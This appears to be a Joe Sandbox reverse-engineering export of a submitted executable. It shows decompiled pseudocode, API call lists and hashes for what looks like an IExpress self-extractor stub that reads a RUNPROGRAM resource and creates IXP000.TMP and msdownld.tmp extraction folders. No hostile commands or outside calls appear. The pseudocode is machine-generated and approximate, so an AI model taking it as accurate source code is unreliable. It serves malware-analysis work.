
                            C-Code - Quality: 70%
                            			E00EB2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				long _t4;
                            				void* _t6;
                            				intOrPtr _t7;
                            				void* _t9;
                            				struct HINSTANCE__* _t12;
                            				intOrPtr* _t17;
                            				signed char _t19;
                            				intOrPtr* _t21;
                            				void* _t22;
                            				void* _t24;
                            				intOrPtr _t32;
                            
                            				_t4 = GetVersion();
                            				if(_t4 >= 0 && _t4 >= 6) {
                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                            					if(_t12 != 0) {
                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                            						if(_t21 != 0) {
                            							_t17 = _t21;
                            							 *0xeba288(0, 1, 0, 0);
                            							 *_t21();
                            							_t29 = _t24 - _t24;
                            							if(_t24 != _t24) {
                            								_t17 = 4;
                            								asm("int 0x29");
                            							}
                            						}
                            					}
                            				}
                            				_t20 = _a12;
                            				_t18 = _a4;
                            				 *0xeb9124 = 0;
                            				if(E00EB2CAA(_a4, _a12, _t29, _t17) != 0) {
                            					_t9 = E00EB2F1D(_t18, _t20); // executed
                            					_t22 = _t9; // executed
                            					E00EB52B6(0, _t18, _t21, _t22); // executed
                            					if(_t22 != 0) {
                            						_t32 =  *0xeb8a3a; // 0x0
                            						if(_t32 == 0) {
                            							_t19 =  *0xeb9a2c; // 0x0
                            							if((_t19 & 0x00000001) != 0) {
                            								E00EB1F90(_t19, _t21, _t22);
                            							}
                            						}
                            					}
                            				}
                            				_t6 =  *0xeb8588; // 0x0
                            				if(_t6 != 0) {
                            					CloseHandle(_t6);
                            				}
                            				_t7 =  *0xeb9124; // 0x0
                            				return _t7;
                            			}


















                            0x00eb2c03
                            0x00eb2c0d
                            0x00eb2c18
                            0x00eb2c20
                            0x00eb2c2e
                            0x00eb2c32
                            0x00eb2c36
                            0x00eb2c3d
                            0x00eb2c43
                            0x00eb2c45
                            0x00eb2c47
                            0x00eb2c49
                            0x00eb2c4e
                            0x00eb2c4e
                            0x00eb2c47
                            0x00eb2c32
                            0x00eb2c20
                            0x00eb2c50
                            0x00eb2c54
                            0x00eb2c57
                            0x00eb2c64
                            0x00eb2c66
                            0x00eb2c6b
                            0x00eb2c6d
                            0x00eb2c74
                            0x00eb2c76
                            0x00eb2c7c
                            0x00eb2c7e
                            0x00eb2c87
                            0x00eb2c89
                            0x00eb2c89
                            0x00eb2c87
                            0x00eb2c7c
                            0x00eb2c74
                            0x00eb2c8e
                            0x00eb2c95
                            0x00eb2c98
                            0x00eb2c98
                            0x00eb2c9e
                            0x00eb2ca7

                            APIs
                            • GetVersion.KERNEL32(?,00000002,00000000,?,00EB6BB0,00EB0000,00000000,00000002,0000000A), ref: 00EB2C03
                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00EB6BB0,00EB0000,00000000,00000002,0000000A), ref: 00EB2C18
                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00EB2C28
                            • CloseHandle.KERNEL32(00000000,?,?,00EB6BB0,00EB0000,00000000,00000002,0000000A), ref: 00EB2C98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Handle$AddressCloseModuleProcVersion
                            • String ID: HeapSetInformation$Kernel32.dll
                            • API String ID: 62482547-3460614246
                            • Opcode ID: 2168f5c29b54d737a1118da1adb604921343c257b9ccec8ad3497beed9624302
                            • Instruction ID: 37ec6b702336b49544278f76a14dceadfcde092c10865cecd467d9c55b7f44fb
                            • Opcode Fuzzy Hash: 2168f5c29b54d737a1118da1adb604921343c257b9ccec8ad3497beed9624302
                            • Instruction Fuzzy Hash: B411E3312003016FCB216BB6AD49AEF7B999F44394B092229BB00F7261CA20DC06CA61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00EB6F40() {
                            
                            				SetUnhandledExceptionFilter(E00EB6EF0); // executed
                            				return 0;
                            			}



                            0x00eb6f45
                            0x00eb6f4d

                            APIs
                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00EB6F45
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 6b3f0175a0b54d3fd86098b4de997c26d2e231da1930efc798d291fca43e9c70
                            • Instruction ID: 3f7fa9d2c1b1c3c112d5a8ddfe80c0225130408de4b55e7cd826d9d98aa4b3b9
                            • Opcode Fuzzy Hash: 6b3f0175a0b54d3fd86098b4de997c26d2e231da1930efc798d291fca43e9c70
                            • Instruction Fuzzy Hash: 719002E42622004BAA501B759D1946775915B4D602F856570E151E4494DB6491445612
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 232 eb55a0-eb55d9 call eb468f LocalAlloc 235 eb55db-eb55f1 call eb44b9 call eb6285 232->235 236 eb55fd-eb560c call eb468f 232->236 248 eb55f6-eb55f8 235->248 241 eb560e-eb5630 call eb44b9 LocalFree 236->241 242 eb5632-eb5643 lstrcmpA 236->242 241->248 245 eb564b-eb5659 LocalFree 242->245 246 eb5645 242->246 250 eb565b-eb565d 245->250 251 eb5696-eb569c 245->251 246->245 252 eb58b7-eb58c7 call eb6ce0 248->252 255 eb5669 250->255 256 eb565f-eb5667 250->256 253 eb589f-eb58b5 call eb6517 251->253 254 eb56a2-eb56a8 251->254 253->252 254->253 259 eb56ae-eb56c1 GetTempPathA 254->259 260 eb566b-eb567a call eb5467 255->260 256->255 256->260 263 eb56f3-eb5711 call eb1781 259->263 264 eb56c3-eb56c9 call eb5467 259->264 269 eb589b-eb589d 260->269 270 eb5680-eb5691 call eb44b9 260->270 274 eb586c-eb5890 GetWindowsDirectoryA call eb597d 263->274 275 eb5717-eb5729 GetDriveTypeA 263->275 272 eb56ce-eb56d0 264->272 269->252 270->248 272->269 276 eb56d6-eb56df call eb2630 272->276 274->263 288 eb5896 274->288 278 eb572b-eb572e 275->278 279 eb5730-eb5740 GetFileAttributesA 275->279 276->263 289 eb56e1-eb56ed call eb5467 276->289 278->279 282 eb5742-eb5745 278->282 279->282 283 eb577e-eb578f call eb597d 279->283 286 eb576b 282->286 287 eb5747-eb574f 282->287 295 eb57b2-eb57bf call eb2630 283->295 296 eb5791-eb579e call eb2630 283->296 292 eb5771-eb5779 286->292 287->292 293 eb5751-eb5753 287->293 288->269 289->263 289->269 298 eb5864-eb5866 292->298 293->292 297 eb5755-eb5762 call eb6952 293->297 307 eb57d3-eb57f8 call eb658a GetFileAttributesA 295->307 308 eb57c1-eb57cd GetWindowsDirectoryA 295->308 296->286 306 eb57a0-eb57b0 call eb597d 296->306 297->286 309 eb5764-eb5769 297->309 298->274 298->275 306->286 306->295 314 eb580a 307->314 315 eb57fa-eb5808 CreateDirectoryA 307->315 308->307 309->283 309->286 316 eb580d-eb580f 314->316 315->316 317 eb5811-eb5825 316->317 318 eb5827-eb585c SetFileAttributesA call eb1781 call eb5467 316->318 317->298 318->269 323 eb585e 318->323 323->298
                            C-Code - Quality: 92%
                            			E00EB55A0(void* __eflags) {
                            				signed int _v8;
                            				char _v265;
                            				char _v268;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t28;
                            				int _t32;
                            				int _t33;
                            				int _t35;
                            				signed int _t36;
                            				signed int _t38;
                            				int _t40;
                            				int _t44;
                            				long _t48;
                            				int _t49;
                            				int _t50;
                            				signed int _t53;
                            				int _t54;
                            				int _t59;
                            				char _t60;
                            				int _t65;
                            				char _t66;
                            				int _t67;
                            				int _t68;
                            				int _t69;
                            				int _t70;
                            				int _t71;
                            				struct _SECURITY_ATTRIBUTES* _t72;
                            				int _t73;
                            				CHAR* _t82;
                            				CHAR* _t88;
                            				void* _t103;
                            				signed int _t110;
                            
                            				_t28 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t28 ^ _t110;
                            				_t2 = E00EB468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                            				_t109 = LocalAlloc(0x40, _t2);
                            				if(_t109 != 0) {
                            					_t82 = "RUNPROGRAM";
                            					_t32 = E00EB468F(_t82, _t109, 1);
                            					__eflags = _t32;
                            					if(_t32 != 0) {
                            						_t33 = lstrcmpA(_t109, "<None>");
                            						__eflags = _t33;
                            						if(_t33 == 0) {
                            							 *0xeb9a30 = 1;
                            						}
                            						LocalFree(_t109);
                            						_t35 =  *0xeb8b3e; // 0x0
                            						__eflags = _t35;
                            						if(_t35 == 0) {
                            							__eflags =  *0xeb8a24; // 0x0
                            							if(__eflags != 0) {
                            								L46:
                            								_t101 = 0x7d2;
                            								_t36 = E00EB6517(_t82, 0x7d2, 0, E00EB3210, 0, 0);
                            								asm("sbb eax, eax");
                            								_t38 =  ~( ~_t36);
                            							} else {
                            								__eflags =  *0xeb9a30; // 0x0
                            								if(__eflags != 0) {
                            									goto L46;
                            								} else {
                            									_t109 = 0xeb91e4;
                            									_t40 = GetTempPathA(0x104, 0xeb91e4);
                            									__eflags = _t40;
                            									if(_t40 == 0) {
                            										L19:
                            										_push(_t82);
                            										E00EB1781( &_v268, 0x104, _t82, "A:\\");
                            										__eflags = _v268 - 0x5a;
                            										if(_v268 <= 0x5a) {
                            											do {
                            												_t109 = GetDriveTypeA( &_v268);
                            												__eflags = _t109 - 6;
                            												if(_t109 == 6) {
                            													L22:
                            													_t48 = GetFileAttributesA( &_v268);
                            													__eflags = _t48 - 0xffffffff;
                            													if(_t48 != 0xffffffff) {
                            														goto L30;
                            													} else {
                            														goto L23;
                            													}
                            												} else {
                            													__eflags = _t109 - 3;
                            													if(_t109 != 3) {
                            														L23:
                            														__eflags = _t109 - 2;
                            														if(_t109 != 2) {
                            															L28:
                            															_t66 = _v268;
                            															goto L29;
                            														} else {
                            															_t66 = _v268;
                            															__eflags = _t66 - 0x41;
                            															if(_t66 == 0x41) {
                            																L29:
                            																_t60 = _t66 + 1;
                            																_v268 = _t60;
                            																goto L42;
                            															} else {
                            																__eflags = _t66 - 0x42;
                            																if(_t66 == 0x42) {
                            																	goto L29;
                            																} else {
                            																	_t68 = E00EB6952( &_v268);
                            																	__eflags = _t68;
                            																	if(_t68 == 0) {
                            																		goto L28;
                            																	} else {
                            																		__eflags = _t68 - 0x19000;
                            																		if(_t68 >= 0x19000) {
                            																			L30:
                            																			_push(0);
                            																			_t103 = 3;
                            																			_t49 = E00EB597D( &_v268, _t103, 1);
                            																			__eflags = _t49;
                            																			if(_t49 != 0) {
                            																				L33:
                            																				_t50 = E00EB2630(0,  &_v268, 1);
                            																				__eflags = _t50;
                            																				if(_t50 != 0) {
                            																					GetWindowsDirectoryA( &_v268, 0x104);
                            																				}
                            																				_t88 =  &_v268;
                            																				E00EB658A(_t88, 0x104, "msdownld.tmp");
                            																				_t53 = GetFileAttributesA( &_v268);
                            																				__eflags = _t53 - 0xffffffff;
                            																				if(_t53 != 0xffffffff) {
                            																					_t54 = _t53 & 0x00000010;
                            																					__eflags = _t54;
                            																				} else {
                            																					_t54 = CreateDirectoryA( &_v268, 0);
                            																				}
                            																				__eflags = _t54;
                            																				if(_t54 != 0) {
                            																					SetFileAttributesA( &_v268, 2);
                            																					_push(_t88);
                            																					_t109 = 0xeb91e4;
                            																					E00EB1781(0xeb91e4, 0x104, _t88,  &_v268);
                            																					_t101 = 1;
                            																					_t59 = E00EB5467(0xeb91e4, 1, 0);
                            																					__eflags = _t59;
                            																					if(_t59 != 0) {
                            																						goto L45;
                            																					} else {
                            																						_t60 = _v268;
                            																						goto L42;
                            																					}
                            																				} else {
                            																					_t60 = _v268 + 1;
                            																					_v265 = 0;
                            																					_v268 = _t60;
                            																					goto L42;
                            																				}
                            																			} else {
                            																				_t65 = E00EB2630(0,  &_v268, 1);
                            																				__eflags = _t65;
                            																				if(_t65 != 0) {
                            																					goto L28;
                            																				} else {
                            																					_t67 = E00EB597D( &_v268, 1, 1, 0);
                            																					__eflags = _t67;
                            																					if(_t67 == 0) {
                            																						goto L28;
                            																					} else {
                            																						goto L33;
                            																					}
                            																				}
                            																			}
                            																		} else {
                            																			goto L28;
                            																		}
                            																	}
                            																}
                            															}
                            														}
                            													} else {
                            														goto L22;
                            													}
                            												}
                            												goto L47;
                            												L42:
                            												__eflags = _t60 - 0x5a;
                            											} while (_t60 <= 0x5a);
                            										}
                            										goto L43;
                            									} else {
                            										_t101 = 1;
                            										_t69 = E00EB5467(0xeb91e4, 1, 3); // executed
                            										__eflags = _t69;
                            										if(_t69 != 0) {
                            											goto L45;
                            										} else {
                            											_t82 = 0xeb91e4;
                            											_t70 = E00EB2630(0, 0xeb91e4, 1);
                            											__eflags = _t70;
                            											if(_t70 != 0) {
                            												goto L19;
                            											} else {
                            												_t101 = 1;
                            												_t82 = 0xeb91e4;
                            												_t71 = E00EB5467(0xeb91e4, 1, 1);
                            												__eflags = _t71;
                            												if(_t71 != 0) {
                            													goto L45;
                            												} else {
                            													do {
                            														goto L19;
                            														L43:
                            														GetWindowsDirectoryA( &_v268, 0x104);
                            														_push(4);
                            														_t101 = 3;
                            														_t82 =  &_v268;
                            														_t44 = E00EB597D(_t82, _t101, 1);
                            														__eflags = _t44;
                            													} while (_t44 != 0);
                            													goto L2;
                            												}
                            											}
                            										}
                            									}
                            								}
                            							}
                            						} else {
                            							__eflags = _t35 - 0x5c;
                            							if(_t35 != 0x5c) {
                            								L10:
                            								_t72 = 1;
                            							} else {
                            								__eflags =  *0xeb8b3f - _t35; // 0x0
                            								_t72 = 0;
                            								if(__eflags != 0) {
                            									goto L10;
                            								}
                            							}
                            							_t101 = 0;
                            							_t73 = E00EB5467(0xeb8b3e, 0, _t72);
                            							__eflags = _t73;
                            							if(_t73 != 0) {
                            								L45:
                            								_t38 = 1;
                            							} else {
                            								_t101 = 0x4be;
                            								E00EB44B9(0, 0x4be, 0, 0, 0x10, 0);
                            								goto L2;
                            							}
                            						}
                            					} else {
                            						_t101 = 0x4b1;
                            						E00EB44B9(0, 0x4b1, 0, 0, 0x10, 0);
                            						LocalFree(_t109);
                            						 *0xeb9124 = 0x80070714;
                            						goto L2;
                            					}
                            				} else {
                            					_t101 = 0x4b5;
                            					E00EB44B9(0, 0x4b5, 0, 0, 0x10, 0);
                            					 *0xeb9124 = E00EB6285();
                            					L2:
                            					_t38 = 0;
                            				}
                            				L47:
                            				return E00EB6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                            			}





































                            0x00eb55ab
                            0x00eb55b2
                            0x00eb55c9
                            0x00eb55d5
                            0x00eb55d9
                            0x00eb5600
                            0x00eb5605
                            0x00eb560a
                            0x00eb560c
                            0x00eb5638
                            0x00eb5641
                            0x00eb5643
                            0x00eb5645
                            0x00eb5645
                            0x00eb564c
                            0x00eb5652
                            0x00eb5657
                            0x00eb5659
                            0x00eb5696
                            0x00eb569c
                            0x00eb589f
                            0x00eb58a7
                            0x00eb58ac
                            0x00eb58b3
                            0x00eb58b5
                            0x00eb56a2
                            0x00eb56a2
                            0x00eb56a8
                            0x00000000
                            0x00eb56ae
                            0x00eb56ae
                            0x00eb56b9
                            0x00eb56bf
                            0x00eb56c1
                            0x00eb56f3
                            0x00eb56f3
                            0x00eb5705
                            0x00eb570a
                            0x00eb5711
                            0x00eb5717
                            0x00eb5724
                            0x00eb5726
                            0x00eb5729
                            0x00eb5730
                            0x00eb5737
                            0x00eb573d
                            0x00eb5740
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb572b
                            0x00eb572b
                            0x00eb572e
                            0x00eb5742
                            0x00eb5742
                            0x00eb5745
                            0x00eb576b
                            0x00eb576b
                            0x00000000
                            0x00eb5747
                            0x00eb5747
                            0x00eb574d
                            0x00eb574f
                            0x00eb5771
                            0x00eb5771
                            0x00eb5773
                            0x00000000
                            0x00eb5751
                            0x00eb5751
                            0x00eb5753
                            0x00000000
                            0x00eb5755
                            0x00eb575b
                            0x00eb5760
                            0x00eb5762
                            0x00000000
                            0x00eb5764
                            0x00eb5764
                            0x00eb5769
                            0x00eb577e
                            0x00eb577e
                            0x00eb5781
                            0x00eb5788
                            0x00eb578d
                            0x00eb578f
                            0x00eb57b2
                            0x00eb57b8
                            0x00eb57bd
                            0x00eb57bf
                            0x00eb57cd
                            0x00eb57cd
                            0x00eb57dd
                            0x00eb57e3
                            0x00eb57ef
                            0x00eb57f5
                            0x00eb57f8
                            0x00eb580a
                            0x00eb580a
                            0x00eb57fa
                            0x00eb5802
                            0x00eb5802
                            0x00eb580d
                            0x00eb580f
                            0x00eb5830
                            0x00eb5836
                            0x00eb583d
                            0x00eb584b
                            0x00eb5851
                            0x00eb5855
                            0x00eb585a
                            0x00eb585c
                            0x00000000
                            0x00eb585e
                            0x00eb585e
                            0x00000000
                            0x00eb585e
                            0x00eb5811
                            0x00eb5817
                            0x00eb5819
                            0x00eb581f
                            0x00000000
                            0x00eb581f
                            0x00eb5791
                            0x00eb5797
                            0x00eb579c
                            0x00eb579e
                            0x00000000
                            0x00eb57a0
                            0x00eb57a9
                            0x00eb57ae
                            0x00eb57b0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb57b0
                            0x00eb579e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb5769
                            0x00eb5762
                            0x00eb5753
                            0x00eb574f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00eb572e
                            0x00000000
                            0x00eb5864
                            0x00eb5864
                            0x00eb5864
                            0x00eb5717
                            0x00000000
                            0x00eb56c3
                            0x00eb56c5
                            0x00eb56c9
                            0x00eb56ce
                            0x00eb56d0
                            0x00000000
                            0x00eb56d6
                            0x00eb56d6
                            0x00eb56d8
                            0x00eb56dd
                            0x00eb56df
                            0x00000000
                            0x00eb56e1
                            0x00eb56e2
                            0x00eb56e4
                            0x00eb56e6
                            0x00eb56eb
                            0x00eb56ed
                            0x00000000
                            0x00eb56f3
                            0x00eb56f3
                            0x00000000
                            0x00eb586c
                            0x00eb5878
                            0x00eb587e
                            0x00eb5882
                            0x00eb5883
                            0x00eb5889
                            0x00eb588e
                            0x00eb588e
                            0x00000000
                            0x00eb5896
                            0x00eb56ed
                            0x00eb56df
                            0x00eb56d0
                            0x00eb56c1
                            0x00eb56a8
                            0x00eb565b
                            0x00eb565b
                            0x00eb565d
                            0x00eb5669
                            0x00eb5669
                            0x00eb565f
                            0x00eb565f
                            0x00eb5665
                            0x00eb5667
                            0x00000000
                            0x00000000
                            0x00eb5667
                            0x00eb566c
                            0x00eb5673
                            0x00eb5678
                            0x00eb567a
                            0x00eb589b
                            0x00eb589b
                            0x00eb5680
                            0x00eb5685
                            0x00eb568c
                            0x00000000
                            0x00eb568c
                            0x00eb567a
                            0x00eb560e
                            0x00eb5613
                            0x00eb561a
                            0x00eb5620
                            0x00eb5626
                            0x00000000
                            0x00eb5626
                            0x00eb55db
                            0x00eb55e0
                            0x00eb55e7
                            0x00eb55f1
                            0x00eb55f6
                            0x00eb55f6
                            0x00eb55f6
                            0x00eb58b7
                            0x00eb58c7

                            APIs
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
                              • Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
                              • Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
                              • Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
                              • Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
                              • Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
                              • Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF
                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00EB55CF
                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00EB5638
                            • LocalFree.KERNEL32(00000000), ref: 00EB564C
                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00EB5620
                              • Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
                              • Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554
                              • Part of subcall function 00EB6285: GetLastError.KERNEL32(00EB5BBC), ref: 00EB6285
                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00EB56B9
                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00EB571E
                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00EB5737
                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00EB57CD
                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00EB57EF
                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00EB5802
                              • Part of subcall function 00EB2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00EB2654
                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00EB5830
                              • Part of subcall function 00EB6517: FindResourceA.KERNEL32(00EB0000,000007D6,00000005), ref: 00EB652A
                              • Part of subcall function 00EB6517: LoadResource.KERNEL32(00EB0000,00000000,?,?,00EB2EE8,00000000,00EB19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00EB6538
                              • Part of subcall function 00EB6517: DialogBoxIndirectParamA.USER32(00EB0000,00000000,00000547,00EB19E0,00000000), ref: 00EB6557
                              • Part of subcall function 00EB6517: FreeResource.KERNEL32(00000000,?,?,00EB2EE8,00000000,00EB19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00EB6560
                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00EB5878
                              • Part of subcall function 00EB597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00EB59A8
                              • Part of subcall function 00EB597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00EB59AF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                            • API String ID: 2436801531-1370313076
                            • Opcode ID: bf19e293574d3ff6a474db95cac623bdc69ce65842424c57f027c5edc970e955
                            • Instruction ID: 9ee8d4e8d7dd4f83530db6b089ce363994b978cb48cef3c861ff1ac01284e357
                            • Opcode Fuzzy Hash: bf19e293574d3ff6a474db95cac623bdc69ce65842424c57f027c5edc970e955
                            • Instruction Fuzzy Hash: AE816AB2B04A149BDB24AB759D81BFB73AD9F60304F0421B6F6C6F2191EF708DC58A50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 95%
                            			E00EB53A1(CHAR* __ecx, CHAR* __edx) {
                            				signed int _v8;
                            				char _v268;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t5;
                            				long _t13;
                            				int _t14;
                            				CHAR* _t20;
                            				int _t29;
                            				int _t30;
                            				CHAR* _t32;
                            				signed int _t33;
                            				void* _t34;
                            
                            				_t5 =  *0xeb8004; // 0x92ae1240
                            				_v8 = _t5 ^ _t33;
                            				_t32 = __edx;
                            				_t20 = __ecx;
                            				_t29 = 0;
                            				while(1) {
                            					E00EB171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                            					_t34 = _t34 + 0x10;
                            					_t29 = _t29 + 1;
                            					E00EB1680(_t32, 0x104, _t20);
                            					E00EB658A(_t32, 0x104,  &_v268); // executed
                            					RemoveDirectoryA(_t32); // executed
                            					_t13 = GetFileAttributesA(_t32); // executed
                            					if(_t13 == 0xffffffff) {
                            						break;
                            					}
                            					if(_t29 < 0x190) {
                            						continue;
                            					}
                            					L3:
                            					_t30 = 0;
                            					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                            						_t30 = 1;
                            						DeleteFileA(_t32);
                            						CreateDirectoryA(_t32, 0);
                            					}
                            					L5:
                            					return E00EB6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                            				}
                            				_t14 = CreateDirectoryA(_t32, 0); // executed
                            				if(_t14 == 0) {
                            					goto L3;
                            				}
                            				_t30 = 1;
                            				 *0xeb8a20 = 1;
                            				goto L5;
                            			}

















                            0x00eb53ac
                            0x00eb53b3
                            0x00eb53b9
                            0x00eb53bb
                            0x00eb53bd
                            0x00eb53bf
                            0x00eb53d1
                            0x00eb53d6
                            0x00eb53e0
                            0x00eb53e2
                            0x00eb53f5
                            0x00eb53fb
                            0x00eb5402
                            0x00eb540b
                            0x00000000
                            0x00000000
                            0x00eb5413
                            0x00000000
                            0x00000000
                            0x00eb5415
                            0x00eb5416
                            0x00eb5427
                            0x00eb542a
                            0x00eb542b
                            0x00eb5434
                            0x00eb5434
                            0x00eb543a
                            0x00eb544c
                            0x00eb544c
                            0x00eb5452
                            0x00eb545a
                            0x00000000
                            0x00000000
                            0x00eb545e
                            0x00eb545f
                            0x00000000

                            APIs
                              • Part of subcall function 00EB171E: _vsnprintf.MSVCRT ref: 00EB1750
                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB53FB
                            • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5402
                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB541F
                            • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB542B
                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5434
                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00EB5452
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_eb0000_file.jbxd
                            Similarity
                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                            • API String ID: 1082909758-2562829823
                            • Opcode ID: bcddbd4bf40849fb5202cdf929171f45ea7e74861a7956e3c62858bdebefe371
